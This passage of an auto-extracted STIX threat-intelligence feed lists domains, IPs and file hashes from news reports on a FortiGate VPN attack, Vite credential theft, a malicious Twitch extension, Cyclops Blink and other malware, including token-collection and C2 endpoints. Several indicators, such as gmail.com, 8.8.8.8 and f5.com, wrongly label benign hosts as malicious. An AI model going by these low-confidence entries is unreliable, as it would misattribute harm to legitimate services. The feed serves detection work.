enro","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9cb70185-35d3-4ee4-b3b3-2175e93d824f","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: co.th","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: a FortiGate 60F SSL-VPN appliance exposed through mail.3bb.co[.]th:10443. Eight reconnaissance scripts fingerprinted the VPN","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c9a4fc04-4309-41b0-8536-baa79dd1d822","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hunt.io","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: configuration. Attack server file directory (Image Source: Hunt.io) Multiple artifacts referenced 3BB infrastructure directly,","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5fb397b3-8b09-48ed-ad19-8cd29caf767e","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: triplet.co","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: , including internal 10.11.x.x addresses, systems under the triplet.co.th domain, and organization-specific credentials. A capture","pattern":"[domain-name:value = 'triplet.co']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--25276d1b-129f-46f6-bf9d-494b2bd7de8c","created":"2026-09-14T16:59:19.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: f5.com","description":"Seen in \"Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials\" (Cyber Security News). Context: allowlists. Vulnerability scan distribution (Image Source: f5.com) Most activity originated from cloud-hosting infrastructure","pattern":"[domain-name:value = 'f5.com']","pattern_type":"stix","valid_from":"2026-09-14T16:59:19.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/vite-servers-under-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4da081eb-8124-4804-95e7-48699b8e08e3","created":"2026-09-14T16:59:19.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: server.host","description":"Seen in \"Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials\" (Cyber Security News). Context: se it to LAN or public interfaces through the –host option, server.host configuration, container port mappings, Kubernetes ingress","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-14T16:59:19.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/vite-servers-under-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--18d65cc0-72a7-40c6-ac21-1c595072b1a8","created":"2026-09-14T16:15:58.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: server.host","description":"Seen in \"Hackers target exposed Vite dev servers to steal AWS, Azure secrets\" (BleepingComputer). Context: pose it online through passing the --host flag, setting the server.host, or misconfigured Docker port mappings. The technology comp","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-14T16:15:58.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-target-exposed-vite-dev-servers-to-steal-aws-azure-secrets/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f67c6b5b-960e-4f31-a2b0-0b44609e5f74","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: alexue4.dev","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: m Developer email listed by chrome-stats Website identifier alexue4[.]dev Copyright identifier linked to the operator IP address 15","pattern":"[domain-name:value = 'alexue4.dev']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8fbb7b4b-cea3-458d-9ab1-384b613663f6","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: api.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: 7[.]186 netcup GmbH, Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc","pattern":"[domain-name:value = 'api.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9d703e15-1f6c-4513-8d65-551db2242711","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: drisnya.online","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: 6154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; host","pattern":"[domain-name:value = 'drisnya.online']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--15fc41f5-1861-4433-8cf2-feecd41d7097","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: enhanced-1.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: tbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]113[.]25 CLODO Cloud, AS216154;","pattern":"[domain-name:value = 'enhanced-1.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--26a6663b-5233-4314-b8a4-6b3a8bd2a074","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: enhanced.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]1","pattern":"[domain-name:value = 'enhanced.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0a3c6ab0-0c82-4ab9-bd05-a24e9001f27f","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ext-03.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; hosts ext-03[.]jeetbot[.]cc Domain jeetbot[.]cc Operator-controlled domain Domain a","pattern":"[domain-name:value = 'ext-03.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--79378ac8-7671-4f90-b7ec-e343225fe07e","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ext-styles.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: P address 132[.]243[.]113[.]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]","pattern":"[domain-name:value = 'ext-styles.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f22bdd39-5ff6-4f17-9545-0ac681e35ea6","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: gmail.com","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: tbot[.]cc Operator contact address Email address cybergnyda@gmail[.]com Developer email listed by chrome-stats Website identifier","pattern":"[domain-name:value = 'gmail.com']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e6e76228-22c5-4bf3-868c-29f4864bd202","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: img.drisnya.online","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: elper/ Public extension-helper API endpoint Screenshot host img[.]drisnya[.]online Image hosting endpoint associated with the operation Hi","pattern":"[domain-name:value = 'img.drisnya.online']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3a89e604-af77-4cc1-ba11-2b84a3ac3f10","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ssociated with the extension listings Email address support@jeetbot[.]cc Operator contact address Email address cybergnyda@gmail[.","pattern":"[domain-name:value = 'jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f9d56d3d-3ce3-4e3f-827d-e650811b79e7","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: morphilina.me","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO","pattern":"[domain-name:value = 'morphilina.me']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--963f69f3-49f4-430c-9f8e-37954f16dc51","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: proxy.morphilina.me","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: jeetbot[.]cc Alternate operator proxy C2 and proxy endpoint proxy[.]morphilina[.]me Token-strip proxy endpoint Configuration endpoint ext-s","pattern":"[domain-name:value = 'proxy.morphilina.me']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f70ecf43-a59e-457a-9296-fb74b6cc1749","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: proxy.thebeholder.deno.net","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: up token-collection endpoint Historical collection endpoint proxy[.]thebeholder[.]deno[.]net/set-token Decommissioned backup token-collection endp","pattern":"[domain-name:value = 'proxy.thebeholder.deno.net']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5344448b-a19e-4179-a8ce-aec2cce2da65","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: thebeholderbotapi.vercel.app","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ssioned backup token-collection endpoint Privacy-policy URL thebeholderbotapi[.]vercel[.]app/twitch-conf Privacy-policy host cited in the investigat","pattern":"[domain-name:value = 'thebeholderbotapi.vercel.app']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--68f6e6cf-1924-42ab-9462-1f38dedf0b2f","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: thebeholder-proxy.deno.dev","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ed token-collection endpoint Historical collection endpoint thebeholder-proxy[.]deno[.]dev/set-token Decommissioned backup token-collection endpoi","pattern":"[domain-name:value = 'thebeholder-proxy.deno.dev']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3503c629-173d-466d-bda4-6ae1d0f9702f","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 141c35607dc0e8e400deb380126b3052bd0495b4d37c8dd979c6aa0204b142fc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ple.com Twitch Enhanced Viewer Firefox Add-ons ID; SHA-256: 141c35607dc0e8e400deb380126b3052bd0495b4d37c8dd979c6aa0204b142fc Note: IP addresses and domains are intentionally defanged (","pattern":"[file:hashes.'SHA-256' = '141c35607dc0e8e400deb380126b3052bd0495b4d37c8dd979c6aa0204b142fc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7c56d893-e764-4092-82e3-a51062c255a9","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: e17e1e671b597da19b89c5b2d0fa821e90e627860e756ae4947ed27c035330a8","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ed Viewer | JeetBot Chrome Web Store extension ID; SHA-256: e17e1e671b597da19b89c5b2d0fa821e90e627860e756ae4947ed27c035330a8 Firefox extension twitchenhancedviewer@example.com Twitch E","pattern":"[file:hashes.'SHA-256' = 'e17e1e671b597da19b89c5b2d0fa821e90e627860e756ae4947ed27c035330a8']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d2d83d73-8003-49a2-a6e3-3d27be907949","created":"2026-09-14T13:33:25.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 89.34.96.56","description":"Seen in \"Cyclops Blink Evolves Into x86-64 Linux Implant With Packet Sniffing and Internal Network Scanning\" (Cyber Security News). Context: ompromise (IoCs):- Type Indicator Description C2 IP address 89.34.96.56 Hard-coded Cyclops Blink command-and-control server C2 TCP","pattern":"[ipv4-addr:value = '89.34.96.56']","pattern_type":"stix","valid_from":"2026-09-14T13:33:25.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/cyclops-blink-evolves/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--26d3e502-b836-4e91-85ec-77b5dcaa90d1","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: mail.uaiubifas.top","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: Staging server hosted on Alibaba Cloud in Hong Kong Domain mail.uaiubifas.top GRAYRABBIT command-and-control domain using port 443 SHA-25","pattern":"[domain-name:value = 'mail.uaiubifas.top']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--68be37ff-0b01-40f1-a76e-e6cdf4488748","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: noht1ng.top","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: thod protocol link used to trigger the exploit chain Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 Staging","pattern":"[domain-name:value = 'noht1ng.top']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--42b03bdb-4305-460c-8f52-63b467662a9e","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 8.218.50.207","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: n Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 Staging server hosted on Alibaba Cloud in Hong Kong Domain","pattern":"[ipv4-addr:value = '8.218.50.207']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2ab84d9c-812a-4531-98e3-19a2edb1b55c","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: RAYRABBIT command-and-control domain using port 443 SHA-256 29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63 Trojanized DLL loader, originally identified as 7zp.dll wit","pattern":"[file:hashes.'SHA-256' = '29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ce06dbf8-7a2f-4e45-a922-59855aab5122","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: ly identified as 7zp.dll with internal name boy.dll SHA-256 749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e Encrypted payload blob identified as p SHA-256 D7a3c7eb94ed","pattern":"[file:hashes.'SHA-256' = '749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b64fa428-8f67-45c1-bd3e-6bd933284581","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: d7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: 98662e02422e Encrypted payload blob identified as p SHA-256 D7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a GRAYRABBIT backdoor with internal name core.dll File name 7","pattern":"[file:hashes.'SHA-256' = 'd7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--efb549bb-fae6-4cd6-b008-18fe7fa469fe","created":"2026-09-14T09:27:43.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 8.8.8.8","description":"Seen in \"Sandworm-Linked Cyclops Blink Returns With Network Scanning and Packet-Sniffing Capabilities\" (GBHackers). Context: entire framework. The module also uses Google Public DNS at 8.8.8.8 over DNS-over-HTTPS access to resolve transfer-host names,","pattern":"[ipv4-addr:value = '8.8.8.8']","pattern_type":"stix","valid_from":"2026-09-14T09:27:43.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/cyclops-blink-variant/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--88a37b38-e915-4ffa-bf6e-a365f32b4a76","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 115.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[","pattern":"[domain-name:value = '115.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7c670a77-d606-4b0f-b5b6-41bd51c6a59d","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 116.181.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.","pattern":"[domain-name:value = '116.181.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--94f05419-cecb-4ff5-a69b-ebc0223c0d9a","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 128.200.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: a0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b HTA downloader Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.","pattern":"[domain-name:value = '128.200.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2e7ed938-fde6-4062-9a52-5097e993ee14","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 129.202.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]","pattern":"[domain-name:value = '129.202.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 